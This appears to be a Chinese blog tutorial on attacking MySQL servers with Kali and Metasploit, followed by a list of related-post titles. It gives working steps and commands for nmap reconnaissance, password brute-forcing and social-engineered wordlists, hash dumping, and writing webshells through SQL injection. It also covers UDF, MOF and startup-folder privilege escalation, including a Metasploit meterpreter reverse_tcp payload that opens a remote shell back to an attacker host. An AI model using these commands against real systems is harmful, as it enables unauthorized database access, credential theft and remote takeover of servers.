【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
目录
一、渗透攻击MySQL
1.1、第一步:信息收集
db_nmap扫描(内置、外置都可)
Metasploit模块
sqlmap
1.2、第二步:获取服务器权限(爆破)
MySQL 口令爆破
哈希值爆破
泄露的源码中寻找数据库密码
向服务器写WebShell
1.3、第三步:提权
UDF提权(UDF提权)
Mof提权
MySQL启动项提权
1.4、第四步:MySQL 0day 漏洞
一、渗透攻击MySQL
1.1、第一步:信息收集
db_nmap扫描(内置、外置都可)
目标发现-iL #添加扫描ip列表文件 -iR #随机选择目标#不用指定目标ip,nmap对全球的ip随机选择100个进行扫描 --exclude #排除扫描
主机发现-sn #ping扫描,不扫描端口 -Pn #完全扫描(穿透防火墙) -PS/PA/PU/PY[portlist] #协议扫描,TCP、SYN/ACK、UDP、SCTP ,基于上述协议扫描端口 -PO[protocol list] #使用ip协议扫描 -n/-R -n: #不进行nds解析 -R: #对其进行反向解析 --dns-servers #更换DNS服务器为得到不同的扫描结果 --traceroute #路由追踪,等同于traceroute命令
端口发现-sS/sT/sA/sW/sM #基于TCP的端口发现(SYN全连接 ACK窗口 Maimon扫描) -sU #基于UPD协议的扫描,但是UDP的扫描的准确率并不高 -sN/sF/sX #基于TCP的空/finish/xmas的扫描 --scanflags <flags> #对TCP的扫描,是对tcpflags位的组合,可以自定义组合 -sI #僵尸扫描 -sY/sZ #基于SCTP协议(少用) -b #基于FTP的中继扫描
端口和扫描菜单-p #扫描特定类型端口/范围 --exclude-ports #排除不需扫描的端口范围 -F #快速扫描 -r #按顺序扫描 namp默认每次扫描中随机选择(常用端口的top n),-r会使namp按照从大到小的顺序进行
服务/版本探测-sV --version-intensity --version-trace 对扫描过程进行跟踪,显示扫描的具体过程
Metasploit模块
#获取MySQL相关信息 auxiliary/admin/mysql/mysql_enum auxiliary/scanner/mysql/mysql_version#文件枚举和目录可写信息枚举 auxiliary/scanner/mysql/mysql_file_enum auxiliary/scanner/mysql/mysql_writable_dirs
sqlmap
通过注入点利用,获取数据库相关信息
1.2、第二步:获取服务器权限(爆破)
如果目标服务器开启3389端口,并且允许远程访问,可以采取爆破MySQL用户密码,获取MySQL的权限
MySQL 口令爆破
爆破成功的几率很低几乎为零,除非管理员用的是弱口令。通过社工可以提高一定成功率,通过收集各种信息,例如姓名、社交平台账号/昵称、手机号、生日、伴侣姓名/生日、职业等信息,通过信息生成针对性的字典,利用该字典进行爆破
1、metasploit相关模块爆破use auxiliary/scanner/mysql/mysql_login set RHOSTS 192.168.x.x set pass_file /tmp/wordlists.txt # 设置字典 set username root run
2、nmap扫描并破解nmap --script=mysql-brute.nse <ip> -p 3306自定义账号、密码 nmap --script=mysql-brute.nse userdb=/tmp/passdb.txt passdb=/tmp/pass.txt 192.168.1.13 -p 3306检查mysql root空口令 nmap --script=mysql-empty-password.nse <ip>
哈希值爆破
auxiliary/scanner/mysql/mysql_hashdump导出在当前登陆用户权限下可以查看账户的密码hash
泄露的源码中寻找数据库密码
网站的配置文件中大多含有数据库的连接配置,如数据库用户名、密码等配置信息eg:config connect等
向服务器写WebShell
前提:存在sql注入漏洞、当前用户具有写入权限、目标网站Web物理路径、secure_file_priv 选项支持数据导出高版本的MYSQL添加了secure_file_priv,对导出文件做了限制:1、输出目录路径应该secure_file_priv值一致,才能导出。2、若其值为空,则无限制。3、值为 NULL 时,表示不允许导入或导出
1.3、第三步:提权
UDF提权(UDF提权)
use exploit/multi/mysql/mysql_udf_payload set rhosts 192.168.x.x set username root set password root runMSF会将一个随机命名的UDF文件写入lib/plugin目录下(该目录不存在,则无法成功),该UDF文件中包含sys_exec()和sys_eval()这两个函数,但是默认只创建sys_exec()函数,该函数执行不会有回显。 可以手动引入 sys_eval() 函数,来执行有回显的命令 create function sys_eval returns string soname 'guuHCUiK.dll';
Mof提权
exploit/windows/mysql/mysql_mof
MySQL启动项提权
use exploit/windows/mysql/mysql_start_up set payload windows/meterpreter/reverse_tcp set lhost 192.168.x.x set lport 4444 set rhosts x.x.x.x set username root set password root set startup_folder xxx # 根据目标系统进行设置自启目录 run
1.4、第四步:MySQL 0day 漏洞
网上查询了去利用
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程相关推荐
- 蓝牙App系列漏洞原理分析与漏洞利用
蓝牙App系列漏洞原理分析与漏洞利用 作者: heeeeen 本文系转载,目的是学习,如有侵权,请联系删除 转载出处:http://www.ms509.com/ 蓝牙App漏洞系列分析之一CVE-20 ...
- Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1.攻击Linux服务器 2.SQL注入攻击 3.shell类型 4.攻击Windows服务器 5.利用公用服务 6.MS17-010 永恒之蓝 ...
- Kali Linux 秘籍 第六章 漏洞利用
第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
- metasploit 快速入门(三) 服务端漏洞利用
目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...
- 漏洞利用(CVE-2017-5638)
**实验准备:**一台Kali主机(攻击机),一台ubuntu主机(靶机),Ubuntu中包含docker,并包含vulhub/struts2:2.3镜像 一.开启Ubuntu,将容器8080映射88 ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- MSF以及Samba漏洞利用
文章目录 MSF以及Samba漏洞利用 一.Metasploit简介 1.1MSF启动 1.2问题报错 1.2.1及时更新源 1.2.2下载数据库 二.Metasploit基础 2.1专业术语 2.2 ...
- msfconsole漏洞利用流程
# 一.阶段划分: 漏洞利用分为 前期交互 情报搜集 威胁建模 漏洞分析 .渗透利用 后渗透利用 报告 这几个阶段 ## 1.前期交互阶段: 与客户组织进行交互讨论,确定范围,目标等 这个 ...
- Chrome 0 day漏洞利用链
远程代码执行漏洞利用 所有的攻击活动都是通过Chrome浏览器执行的.虽然研究人员无法获取漏洞利用的JS代码,但是研究人员根据相关攻击活动的时间轴推测出了利用的漏洞--CVE-2021-21224.此 ...
- 被玩坏的IE浏览器——漏洞利用方法和技巧介绍
0x01 基本介绍 自1995年以来,Internet Explorer一直是Microsoft Windows操作系统的核心部分.尽管正式停止了对Edge浏览器的进一步开1发,但由于其持续使用的情况 ...
最新文章
- STC89C52单片机 独立键盘
- 第3章 IP寻址
- 菜鸟之2011-2012学年总结
- springboot使用PageHelper实现分页
- Ibatis - Open quote is expected for attribute {1} associated with an element type '
- 【干货】人人都能看懂的LSTM
- 微信公众号开发--微信JS-SDK扫一扫功能
- Hive数据导出的几种方式
- python 开发工具_Python开发工具之神兵利器
- 有状态容器实践:k8s集成ceph分布式存储
- 论文笔记_S2D.68_深度补全网络
- java invokevirtual_Java | 深入理解方法调用的本质(含重载与重写区别)
- github 安装浏览器导航插件Octotree
- 教你给视频添加马赛克的剪辑技巧,轻松简单
- html drag 例子,html5 drag事件用法
- STM32 三极管继电器驱动电路设计
- 学java进美团_美团实习Java岗面经,已拿offer
- win10 手动下载升级 Powershell terminal
- jquery——淡入淡出(fadein与fadeout)
- php 微信开发 网页授权登录,微信开发网页授权登录——2018年6月2日
热门文章
- 跟着狂神学Docker(精髓篇)
- git 进阶 (四)变基提交
- 我的大学六年(郭天祥原创)
- flstudio软件怎么设置中文语言切换?
- 常见分布式算法的介绍
- 华为鸿蒙系统支持19款机型 有你的手机吗,华为鸿蒙OS再生变数,首批只有19款机型可升级,有你的手机吗?...
- Leetcode|MySQL|数据库刷题记录(601~627)
- 自媒体推广应该怎么入手,如何去做
- PRA是个啥?老板表示很满意!
- (HBuilder X) 从下载HBuilderX到生成app.apk